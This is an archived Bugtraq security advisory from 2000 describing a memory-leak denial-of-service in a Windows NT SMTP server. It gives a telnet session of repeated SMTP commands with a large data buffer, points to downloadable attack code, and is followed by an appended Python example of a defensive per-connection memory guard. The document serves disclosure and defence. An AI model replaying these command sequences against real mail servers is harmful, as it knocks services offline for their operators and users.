Bugtraq mailing list archives
Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x
From: labs () USSRBACK COM (Ussr Labs)
Date: Thu, 13 Jan 2000 05:25:27 -0300
Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x

USSR Advisory Code: USSR-2000031
Release Date: January 13, 2000

Systems Affected:
Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for WinNT Version 1.9x and maybe other versions.

THE PROBLEM

A memory leak exists in the Super Mail Transfer Package that may cause an NT host to stop functioning and/or need to be rebooted.

The memory leak may occur when you connect to the SMTP port: all information you send to the system will be stored in memory, and SMTP supports multiple HELO / MAIL FROM / RCPT TO / DATA in the same connection. If you do multiple HELO / MAIL FROM / RCPT TO / DATA in the same connection, the memory may not be deallocated. This condition may cause the computer to stop functioning the moment memory runs out.

Example:

    [hellme () die-communitech net$ telnet example.com 25
    Trying example.com...
    Connected to example.com.
    Escape character is '^]'.
    220 MachineNamet AttackerIp with SMTP for NT BD0198
    HELO CHEEF
    250 Hello, AtackerHostName AttackerIp
    mail to:<sssa.com>
    250 <sssa.com@localhost> ok
    rcpt to:<sssc.com>
    250 to:<sssc.com> ok
    Data
    354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
    [buffer]
    (point)
    250 OK

If you repeat these commands, all information passed to the server will be stored in memory, thus the memory leak problem, where [buffer] is approx. 10000 characters.

Binary or source for this D.o.s:
http://www.ussrback.com/

Do you do the w00w00? This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is, don't you?
http://www.w00w00.org/advisories.html

Vendor Status: Contacted.
Vendor Url: http://www.web-net.com/supermail/
Program Url: http://shareit1.element5.com/programs.html?nr=100364

Credit: USSRLABS

SOLUTION

Vendor says: The related problems are fixed in the next generation of SMTP, called MsgCore/NT.

Greetings: EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com
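The advisory describes memory that is kept across repeated HELO / MAIL FROM / RCPT TO / DATA cycles on one connection. The Python below is an added example, not part of the advisory or the vendor's code: it shows the per-connection bound a mail server can apply so that nothing from a finished message stays in memory. `SessionGuard`, `replay` and both limits are hypothetical names and assumed policy values, and the session fed to it is constructed.

```python
MAX_TRANSACTIONS = 20          # assumed policy: mail transactions per connection
MAX_MESSAGE_BYTES = 64 * 1024  # assumed policy: bytes stored per DATA body

class SessionGuard:
    """State for one client connection; bounds what the server holds for it."""
    def __init__(self):
        self.transactions, self.in_data, self.closed = 0, False, False
        self.body = bytearray()    # only the message currently being received

    def held_bytes(self):
        return len(self.body or b"")

    def feed(self, line):
        """Take one client line (CRLF stripped); return the reply, or '' for none."""
        if self.in_data:
            if line != b".":
                if self.body is not None:
                    if len(self.body) + len(line) + 2 > MAX_MESSAGE_BYTES:
                        self.body = None          # over limit: stop storing, keep draining
                    else:
                        self.body += line + b"\r\n"
                return ""
            oversized, self.in_data = self.body is None, False
            self.body = bytearray()               # release the buffer after every message
            if oversized:
                return "552 message exceeds size limit"
            self.transactions += 1
            return "250 OK"
        verb = line.split(None, 1)[0].upper() if line.strip() else b""
        if verb == b"MAIL" and self.transactions >= MAX_TRANSACTIONS:
            self.closed = True                    # caller closes the socket after this reply
            return "421 too many transactions, closing connection"
        if verb == b"DATA":
            self.in_data = True
            return "354 end with <CR><LF>.<CR><LF>"
        return "250 ok"

def replay(transactions, body_len):
    """Feed a constructed session to a guard; return (last reply, peak bytes held between messages)."""
    guard, last, peak = SessionGuard(), "", 0
    guard.feed(b"HELO client.example")
    for _ in range(transactions):
        for line in (b"MAIL FROM:<a@client.example>", b"RCPT TO:<b@server.example>",
                     b"DATA", b"x" * body_len, b"."):
            if guard.closed:
                return last, peak
            last = guard.feed(line)
        peak = max(peak, guard.held_bytes())
    return last, peak
```

Dot-unstuffing, RSET and QUIT handling are left out to keep the state machine small; a production server would also apply an idle timeout per connection.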